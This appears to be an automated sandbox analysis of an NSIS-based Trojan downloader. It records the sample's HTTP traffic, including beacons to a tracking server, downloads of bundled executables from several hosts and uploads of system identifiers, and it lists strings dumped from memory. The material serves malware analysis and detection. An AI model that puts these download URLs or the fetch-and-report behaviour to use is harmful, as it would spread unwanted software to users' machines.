ETag: "d827c232ea17f09532bc7d73cc6cf44e"
Accept-Ranges: bytes
Server: AmazonS3
Age: 57139
X-Cache: Hit from cloudfront
Via: 1.1 c77b51ad135b3319a54e2e40de778962.cloudfront.net (CloudFront)
X-Amz-Cf-Id: RBauuL7YsSsuQckizFNs9VblxdP9IW1JdXXcpzFc5Hm4LIP991Y_Lg==
<<< skipped >>>
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1726\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 06 Nov 2015 06:58:24 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 121
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1727\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 06 Nov 2015 06:58:24 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 177
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 06 Nov 2015 06:58:25 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 190
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 06 Nov 2015 06:58:26 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 181
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://livestatscounter.com/SysInfo/validator/timer.php&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 06 Nov 2015 06:58:26 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 194
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://livestatscounter.com/SysInfo/validator/timer.php&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 06 Nov 2015 06:58:26 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 185
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXps://d24u51ac8ybaqu.cloudfront.net/inst/setup_42cd63.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 06 Nov 2015 06:58:27 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 198
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXps://d24u51ac8ybaqu.cloudfront.net/inst/setup_42cd63.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 06 Nov 2015 06:58:27 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 173
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://dl.randkeygen.com/crcb/123/installer.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 06 Nov 2015 06:58:29 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 186
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://dl.randkeygen.com/crcb/123/installer.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 06 Nov 2015 06:58:29 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 189
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXps://s3.amazonaws.com/cf_vopackage/SysInfo/SearchUpdater.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 06 Nov 2015 06:58:30 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 202
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXps://s3.amazonaws.com/cf_vopackage/SysInfo/SearchUpdater.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 06 Nov 2015 06:58:30 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 199
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d1mdi78qyff344.cloudfront.net/7121923af824073a25b2b7e6ba0a6e0e.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 06 Nov 2015 06:58:43 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 212
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d1mdi78qyff344.cloudfront.net/7121923af824073a25b2b7e6ba0a6e0e.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 06 Nov 2015 06:58:45 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 159
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://cdn-14b7.kxcdn.com/Cdn.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 06 Nov 2015 06:58:46 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 172
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://cdn-14b7.kxcdn.com/Cdn.exe&errorlevel=2&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 06 Nov 2015 06:58:50 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 182
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://mobilitydata5.com/SysInfo/tem.php?sid=83837567483&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 06 Nov 2015 06:58:50 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
GET /SysInfo/Validate.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: download-servers.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.8.0
Date: Fri, 06 Nov 2015 06:58:24 GMT
Content-Type: application/octet-stream
Content-Length: 61981
Last-Modified: Fri, 15 May 2015 16:16:55 GMT
Connection: keep-alive
ETag: "55561bf7-f21d"
Accept-Ranges: bytes
<<< skipped >>>
POST /thankyou.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.downloadsoup.com
Content-Length: 469
Connection: Keep-Alive
Cache-Control: no-cache
cnt=afa23776af58eb1f539dab5af33ea66d&_srvlog=NSI &browser=ie&capp=nsdummy&cid=11612&current_screen=Finish_Last_Screen&is=0&netfs=0&os=&sysid=6FE5DDD064E91F40D31A83BB9FE8886E&sysid1=6FE5DDD064E91F40D31A83BB9FE8886E&te=1446793133&ts=1446793133&ver=1.1.2.41&c[OperaRUnew][s]=-2&c[Updater][s]=8&c[Updater][pi]=1&c[OperaRUnew][pi]=0&c[OperaRUnew][e]=0&c[OperaRUnew][ts]=0&c[OperaRUnew][te]=0&cmdl=C:DOCUME~1admLOCALS~1Tempsq1C.tmp /ci 11612&bti1=
HTTP/1.1 200 OK
Content-Type: text/plain; charset=UTF-8
Date: Fri, 06 Nov 2015 06:58:47 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
Content-Length: 14
Connection: keep-alive
.... ....
GET /SysInfo/tem.php?sid=83837567483 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: mobilitydata5.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.8.0
Date: Fri, 06 Nov 2015 06:58:50 GMT
Content-Type: application/octet-stream
Content-Length: 61745
Connection: keep-alive
X-Powered-By: PHP/5.5.24
Content-Transfer-Encoding: binary
Content-Disposition: attachment; filename=CZPOAqqx9
<<< skipped >>>
GET /crossbrowse/ie/106/ie.zip.005 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: zip.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 06 Nov 2015 06:58:31 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1431408217"
Last-Modified: Tue, 12 May 2015 05:23:37 GMT
Cache-Control: max-age=81620
Content-Length: 8076624
Content-Type: text/plain; charset=UTF-8
X-HW: 1446793111.dop013.fr7.t,1446793111.cds040.fr7.c
<<< skipped >>>
GET /utility.gif?report=fdata&f=4&c=003040&i=100&n=install_browser_start_async&ibic=0beb334165382025853a9a860db0b131&rnd=2056 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: XYmvvBMCiNJ6rVedDRFa69v1YANR9WCzHw5G5n2NBxqlGP1xatdKyybRRSGyfr8r
x-amz-request-id: 95DE9A77C9061F96
Date: Fri, 06 Nov 2015 06:58:32 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=4&c=003040&i=250&n=install_browser_downloading&ibic=0beb334165382025853a9a860db0b131&rnd=9183 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: CBHR1bE/VuPzv0/HQy0QdE i8i 74KftUfvClZSjkbI1EL9uRF7bDWL5goojla2W
x-amz-request-id: D4AE7D0D8D1340BC
Date: Fri, 06 Nov 2015 06:58:32 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=4&c=003040&i=270&n=install_browser_all_thread_created_success&ibic=0beb334165382025853a9a860db0b131&rnd=2165 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: 6Ar7bqkcLfdJEwnpk9fPljon12qr5JH8MwaxEKUzOIwmNLqeC3mqFjSjusc6895U
x-amz-request-id: 76325E2C0BC11F3D
Date: Fri, 06 Nov 2015 06:58:32 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=4&c=003040&i=310&n=install_browser_all_thread_ended_success&ibic=0beb334165382025853a9a860db0b131&rnd=1604 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: CxcApR4//c/YoYSaNd4eN645XwOYOLNvPAxi3Hk8FLjWG vXPaKzfOdWLGWtYmU3
x-amz-request-id: 5067FF44500FEEA2
Date: Fri, 06 Nov 2015 06:58:39 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=4&c=003040&i=360&n=install_browser_all_files_in_place&ibic=0beb334165382025853a9a860db0b131&rnd=8259 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: SaSlj6NdJMTqA/nS q sk6uH8HjSfUffsNTji4xuXi2Ew5lTpTX60/El2s8ce6r9
x-amz-request-id: 7DEA6CCA0132797E
Date: Fri, 06 Nov 2015 06:58:41 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=4&c=003040&i=410&n=install_browser_install_ch_success&ibic=0beb334165382025853a9a860db0b131&rnd=2512 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: JfKIaeh7u0R1zYfjG3x1lrVgK4hRq8tnpAN4jeP8u8yQqBj/JHfN9MjM/RWWoU 7
x-amz-request-id: 5D883FD5BB76976D
Date: Fri, 06 Nov 2015 06:58:52 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=4&c=003040&i=480&n=install_browser_end_success&ibic=0beb334165382025853a9a860db0b131&rnd=8780 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: izyiwRW1lR sBzppH1X4ARN2PY/AgDqWc8fyYdQzpKacU7/okJcni4xcvop8YhXF
x-amz-req
GET /OperaRUnew/Bundle_OperaRUnew.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.software-forus.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 06 Nov 2015 06:58:44 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1444112779"
Last-Modified: Tue, 06 Oct 2015 06:26:19 GMT
Cache-Control: max-age=894
Content-Length: 116063
Content-Type: application/octet-stream
X-HW: 1446793125.dop016.fr7.t,1446793124.cds042.fr7.c
<<< skipped >>>
GET /installer.gif?action=started&ibic=0beb334165382025853a9a860db0b131&verifier=c44c7974c60e7df1a3884ce64812983e&os=XP32&chver=X&ffver=X&iever=6&app=12345&srcid=003040&default=ie&ver=106&crtnm=OralTeams&rnd=45 HTTP/1.1
Accept: */*
Host: mystats.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: tvVHBcgmNTq4nDfn2Zxw1KjIhFoQXZvRhOB89yEJyhPP5HOAa2ZbrcnOzUwAUzV1IUeIW6NIBBk=
x-amz-request-id: A6C6A15EFB4488E1
Date: Fri, 06 Nov 2015 06:58:31 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:41 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
Map
The Trojan connects to the servers at the following location(s):
Strings from Dumps
%original file name%.exe_468:
.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
unpacking data: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|/":
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsz2A.tmp
60TotalSecurity.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst3.tmp\inetc.dll
hXXp://mobilitydata5.com/SysInfo/tem.php?sid=83837567483
b7e6ba0a6e0e.exe&errorlevel=0
hXXp://download-servers.com/partners/360/360TotalSecurity.exe
System.dll
callback%d
@.reloc
u.Uj@
MSVCRT.dll
HttpSendRequestA
HttpSendRequestExA
HttpQueryInfoA
FtpCreateDirectoryA
FtpOpenFileA
HttpOpenRequestA
HttpAddRequestHeadersA
HttpEndRequestA
InternetCrackUrlA
WININET.dll
inetc.dll
Open URL Error
URL Parts Error
FtpCreateDir failed (550)
Error FTP path (550)
Downloading %s
%dkB (%d%%) of %dkB @ %d.dkB/s
(%d %s%s remaining)
REST %d
SIZE %s
Content-Length: %d
Content-Type: application/x-www-form-urlencoded
Authorization: basic %s
Proxy-authorization: basic %s
%s:%s
FtpCommandA
wininet.dll
%u MB
%u kB
%u bytes
%d:d:d
%s - %s
(Err=%d)
NSIS_Inetc (Mozilla)
Filename: %s
/password
Uploading %s
8!8-8B8I8}8
kDC.oQ
w.spR5
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf2B.tmp
nsf2B.tmp
//livestatscounter.com/Generic/vos.php?ch=
92c9655f14abb39377f27c1a0aa364.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsz2A.tmp
Uninstall.exe
n.php?r=vu_vo2_
d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe
c:\%original file name%.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
%original file name%.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst3.tmp
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://mobilitydata5.com/SysInfo/tem.php?sid=83837567483&v=2\"}"}
e0e.exe&errorlevel=0&v=2\"}"}
hXXp://ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
url=hXXp://mobilitydata5.com/SysInfo/tem.php?sid=83837567483
e6ba0a6e0e.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsa6.tmp
dlgen.php?r=vu_vo2_
)-.Yln
Nullsoft Install System v2.46
222222222222
1.0.0.1
nsz2A.tmp_784:
.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|/":
%Program Files%
\System.dll
\nsExec.dll
\inetc.dll
$$\wininit.ini
q.oXz
1GRqL9)%sX
YB%U}^
g.ZO||k[
^2S%S
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsz2A.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
nsz2A.tmp
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsa2C.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsz2A.tmp
Nullsoft Install System v2.46